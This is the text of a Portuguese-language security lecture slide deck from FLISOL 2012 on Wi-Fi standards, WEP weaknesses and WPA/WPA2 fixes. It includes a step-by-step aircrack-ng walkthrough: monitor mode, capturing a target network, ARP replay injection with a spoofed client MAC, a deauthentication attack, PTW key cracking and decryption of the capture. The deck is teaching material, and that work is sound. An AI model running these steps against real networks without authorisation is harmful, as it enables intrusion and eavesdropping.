Apresentação flisol2012 prof_joséquaresmafilho

30/04/2012

• José Quaresma Filho
• Técnologo em Redes de Computadores
• Especialista em Segurança da Informação

• Experiência Profissional (IFPB e Faculdade iDEZ)
Atualmente Professor do CST em Redes de Computadores
Disciplinas :
Segurança de Redes,
Práticas em Segurança de Redes,
Redes Sem Fio e Redes Móveis
Redes Convergentes e Gerência e Desempenho de Redes de Computadores.
Coordenador do CST em Redes de Computadores – Faculdade iDEZ
Coordenador da Pós-Graduação em Segurança da Informação –
Segurança em Redes Sem Fio IEEE 802.11 Faculdade iDEZ
Professor da Pós-Graduação (Especialização) em Segurança da
Professor: José Quaresma Filho Informação na Faculdade iDEZ e na FIP/I2P
Disciplinas: Criptografia e Protocolos Seguros, Segurança da Informação na
Realidade dos Negócios, Segurança nas Tecnologias de Trasnmissão.
2009 a 2011 - Administrador de Redes da FUNESC
1993 a 2009 - Administrador de Redes da FAC
Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho

ENTRE EM CONTATO

jose.filho@faculdadeidez.edu.br
zefilho@ifpb.edu.br

(83) 8852-2274
(83) 9924-8516

Se preferir…

ROTEIRO
•Introdução
•Conceitos de redes Wi-Fi
•História do padrão IEEE 802.11
•Principais vulnerabilidades
•Principais ataques
•Soluções Propostas
• WPA (WEP2) e IEEE 802.11i (WPA2)


1

30/04/2012

• INTRODUÇÃO:
– Definindo o escopo
• Redes Sem Fio
– Infravermelho
IEEE 802.11
– Bluetooth (IEEE 802.15.1)
– Zigbee (IEEE 802.15.4)
– WI-FI (IEEE 802.11)
– WiMAX (IEEE 802.16)
Wi-Fi Alliance
– Redes Celulares Wi-Fi (Wireless Fidelity)


IEEE 802.11 O primeiro padrão aprovado: IEEE std 802.11-1997

1990 Professor: José Gomes Quaresma Filho
Substituída pela IEEE Std 802,11-
2007 (Revisão de IEEE Std 802,11-
1.999)

Professor: José Gomes Quaresma Filho

IEEE std 802.11-1999 IEEE 802.11a


2

30/04/2012

IEEE 802.11b IEEE 802.11g


IEEE std 802.11i-2004 IEEE std 802.11-2007


IEEE std 802.11n
CRONOLOGIA

1997 1997 1999 1999 2004 2009
FHSS DSSS HR/DSSS OFDM OFDM MIMO
802.11 802.11 802.11b 802.11a 802.11g 802.11n
(2Mbps) (2Mbps) (11Mbps) (54Mbps) (54Mbps) (108Mbps)

2,4 GHz 5,0 GHz 2,4 GHz 2,4 e 5,0
ISM UNII


3

30/04/2012

Faixa UNII (5GHz)
root@root:~ # iwlist wlan0 freq
wlan0 14 channels in total; available frequences
Channel 01 : 2.412 GHz
Faixa ISM (2,4GHz) Channel 10 : 2.457 GHz
root@root:~ #


MODELOS DE REFERÊNCIA

APLICAÇÃO
APRESENTAÇÃO
SESSÃO APLICAÇÃO
TRANSPORTE TRANSPORTE
REDE INTER-REDES
Subcamada LLC
ENLACE
Subcamada MAC ACESSO À REDE
FÏSICA FÍSICA

OSI IEEE 802 TCP/IP


CONTROLE DE ACESSO
• Identificação
• Autenticação
• Autorização


4

30/04/2012

Antes de começar
Descubra o chipset da sua placa de rede wireless

#lspci | grep Network


• Modos de operação das placas wireless
– Managed (gerenciado)
– Ad-hoc
– Monitor (RFMON)
– Master (mestre = AP)

http://www.backtrack-linux.org/wiki/index.php/Wireless_Drivers#Tested_and_working_cards

• iwconfig
• iwconfig wlan0
• iwconfig wlan0 mode monitor
• airmon-ng start wlan0


5

30/04/2012

Ocultando o ESSID Cliente não “enxerga” a rede


#airodump-ng wlan0


WEP Wired Equivalent Privacy


6

30/04/2012

Principais características Principais problemas
• Usa PSK (Pre Shared Key) • O IV trafega em texto plano
• Chaves pré-compartilhadas nas Estações • Com 24 bits (3 bytes) o IV tem 224=16,8 milhões
de possibilidades
(STAs) e Access Points (Aps)
• Numa rede com tráfego de 11 Mpbs – IEEE
• Chave WEP 64: IV (24 bits) + Key (40 bits) 802.11b levaria aproximadamente 9h para os IVs
• Chave WEP 128: IV (24 bits) + Key (104 bits) começarem a se repetir.
• Usa o algoritmo RC4 para cifrar os pacotes • Não existe autenticação do usuário
• No modo Open System a autenticação se baseia
• O IEEE não determinou uma política para a apenas no SSID
troca das chaves • Não há mecanismos para autenticar o AP

Principais ataques ao WEP
• 2001 - Fluhrer, Mantin e Shamir (estatística)
• 2004 – Chopchop (estatística)
• 2007 - Pychkine, Tews e Weinmann (PTW força
bruta)
#aircrack-ng
#airmon-ng
#aireplay-ng
#airodump-ng
#airdecap-ng
#aircrack-ng

Colocando a interface em modo
monitor

Explorando as
vulnerabilidades
do WEP


7

30/04/2012

Mas será que alguém ainda usa WEP??

# airodump-ng mon0


# airodump-ng --bssid 00:14:D1:49:EA:AE
--channel 11 --write captura mon0

Onde:

• --bssid : MAC address do AP alvo.
• --channel: canal utilizado.
• --write: arquivo onde os dados serão gravados.


E se o número de pacotes for insuficiente?
• Rede com baixo tráfego
• Pouco tempo de captura
Dados = O
• Troca dinâmica da chave WEP

Estações conectadas
MAC do AP


8

30/04/2012

Injetando pacotes na rede Testando a interface
# aireplay-ng --test mon0
12:39:40 Trying broadcast probe requests…
12:39:40 Injection is working!
12:39:42 Found 1 AP
12:39:42 Trying direct probe requests…
12:39:42 00:14:D1:49:EA:AE – channel 11 – XXXXXX
12:39:42 Ping (min/avg/max): 1,671 ms/6,987ms/11,453ms
Power:- 15,76
12:39:42 30/30: 100%


# aireplay-ng --arpreplay
-b 00:14:D1:49:EA:AE
-h 00:25:CF:89:22:DC mon0

Onde:

• -b : MAC address do AP alvo.
• -h: MAC address do cliente conectado que
será “spoofado”.


Tempo = 4 min

Dados = 99504 pacotes

E se não tiver tráfego ARP ?
• Espera uma nova conexão
• Força uma desconexão de um cliente
#aireplay-ng --deauth 100
–h 00:25:CF:89:22:DC
-b 00:14:D1:49:EA:AE mon0


9

30/04/2012

Quebrando a senha # aircrack-ng -z
-b 00:14:D1:49:EA:AE
captura*.cap
Obs: -z Ataque PTW

Onde:

• -b : MAC address do AP alvo.
• captuta*.cap: arquivos onde foram
armazenados os pacotes capturados

Depois de descobrir a senha o que eu faço??

#airdecap-ng –w KEY –b 00:14:D1:49:EA:AE
captura*.cap

Chave “secreta”


SOLUÇÕES TKIP – key mixing

• WPA Personal (2002)
– TKIP – geração de chaves aleatórias - função
de key mixing
– IV de 48 bits -2,8 x 1014 possibilidades
– Chave PSK com mínimo de 64 bits
– Chave utilizada pelo RC4 de 128 bits
– Algoritmo de verificação de integridade do frame -
MIC


10

30/04/2012

WPA Enterprise • IEEE 802.11i - 2004
• 802.1x – padrão do IEEE para Controle de acesso – Robust Security Networks (RSN):
– Funciona em conjunto com Extensible Authentication Protocol
(EAP) ou EAPOL – over LAN – Um mecanismo de privacidade de dados, ou seja,
• Servidor de Autenticação - Radius um modelo de criptografia de dados utilizando um
certo algoritmo. Podem ser utilizados o TKIP com o
algoritmo RC4 ou o CCMP com o algoritmo AES
– Utilização do IEEE 802.1X para controle de acesso e
o gerenciamento de chaves do mesmo IEEE 802.1X
para fornecer as chaves ao ponto de acesso e
usuário.


MUITO OBRIGADO !!
• Estabelecimento de um canal seguro entre o
ponto de acesso e o servidor de autenticação.
• Localizar a rede, negociar os algoritmos de
criptografia e associar o algoritmo à rede.
• Realizar a autenticação 802.1X com o servidor de
autenticação.
• Autenticação mutua e estabelecimento das
chaves aos pares (para o ponto de acesso e
usuário).
• Estabelecimento das chaves criptográficas.


PERGUNTAS

Professor: José Gomes Quaresma Filho

11

Apresentação flisol2012 prof_joséquaresmafilho

Mais conteúdo relacionado

Semelhante a Apresentação flisol2012 prof_joséquaresmafilho

Apresentação flisol2012 prof_joséquaresmafilho